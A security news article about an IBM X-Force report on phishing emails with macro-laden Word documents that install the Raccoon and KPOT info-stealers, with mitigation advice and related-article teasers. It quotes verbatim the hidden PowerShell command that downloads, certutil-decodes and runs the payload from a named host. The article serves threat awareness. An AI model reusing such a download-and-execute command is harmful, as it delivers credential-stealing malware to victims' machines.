Friday, May 24, 2024

Hackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Researchers from X-Force uncovered a malicious campaign with Info-stealer called “Raccoon” and “KPOT” that targets the Windows Users via fake emails to steal sensitive data.

Raccoon malware believed to be originated from the Russian speaking hackers and it has actively attacked financial and government organizations last year with Fallout & RIG Exploit Kits.

Type of Attempts to infect the Windows Users

This malware campaign delivers the payload via email that contains a weaponized document which is signed using the DocuSign software, DocuSign is a company well known for enabling organizations to manage electronic documents.


Document subject is referred to as “files” or “paperwork” a tempt victims to open a file, and execute the payload in the victim’s windows machine.

Another sextortion fallout email sample that collected by the researchers has contains the following body content and claim themselves as “the Red Skull hacker crew”:

“Private info belonging to your friend has been stolen”, “Your colleague’s account was compromised” or “We have got access to your friend’s account”.

Also, the attacker sends an intimate picture of his girlfriend and threatened the person to distribute the picture to his complete contact list if the victims not paying the demanded ransom of 500 dollars.

A very recent sample that uncovered by the researchers from IBM X-Force, posing as an official “indictment message” sent by the court. This is supposed to frighten victims into believing that they are actually sued in court for something they do not know of. 

The body of the email urging the victims to examine and print out the documents and also giving a deadline for a response and explaining the consequences if the victims failed to open the malicious document.


These are the main attempts of tempting victims to open the attachment to executing the malware payload by the attacker.


Once open the malicious document, it keeps urging users to click the “Enable content ” that helps them to execute the macro on the Windows machine.

All emails contain exactly the same macro content. as soon as the macros are run, a PowerShell command is executed in the background.

powershell -windowstyle hidden Import-Module BitsTransfer; Start-BitsTransfer -Source,, -Destination "$env:TEMP\","$env:TEMP\sfera","$env:TEMP\"; Set-Location -Path "$env:TEMP"; certutil -decode sfera tref;  Start-Process -ArgumentList tref

The above command will download the Raccoon info stealer hosted on corp6[.]site.

In the recent campaign deliver the KPOT and another info-stealer via new hardcoded URLs.

It is worth mentioning, that we have seen info stealing malware distributed comparably on the domains corp5[.]site, corp6[.]site and now corp7[.]site. Researchers said.


1. Do not click or open links in emails directly, instead type in the main URL in your browser or search the brand/company via your preferred search engine.

2. Ensure anti-virus software and associated files are up to date.

3. Search for existing signs of the indicated IOCs in your environment.

4. Block all URL and IP based IOCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.

5. Keep applications and operating systems running at the current released patch level.




Latest articles

Hackers Weaponizing Microsoft Access Documents To Execute Malicious Program

In multiple aggressive phishing attempts, the financially motivated organization UAC-0006 heavily targeted Ukraine, utilizing...

Microsoft Warns Of Storm-0539’s Aggressive Gift Card Theft

Gift cards are attractive to hackers since they provide quick monetization for stolen data...

Kinsing Malware Attacking Apache Tomcat Server With Vulnerabilities

The scalability and flexibility of cloud platforms recently boosted the emerging trend of cryptomining...

NSA Releases Guidance On Zero Trust Maturity To Secure Application From Attackers

Zero Trust Maturity measures the extent to which an organization has adopted and implemented...

Chinese Hackers Stay Hidden On Military And Government Networks For Six Years

Hackers target military and government networks for varied reasons, primarily related to spying, which...

DNSBomb : A New DoS Attack That Exploits DNS Queries

A new practical and powerful Denial of service attack has been discovered that exploits...

Malicious PyPI & NPM Packages Attacking MacOS Users

Cybersecurity researchers have identified a series of malicious software packages targeting MacOS users.These...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Free Webinar

Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise.
Key takeaways include:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Related Articles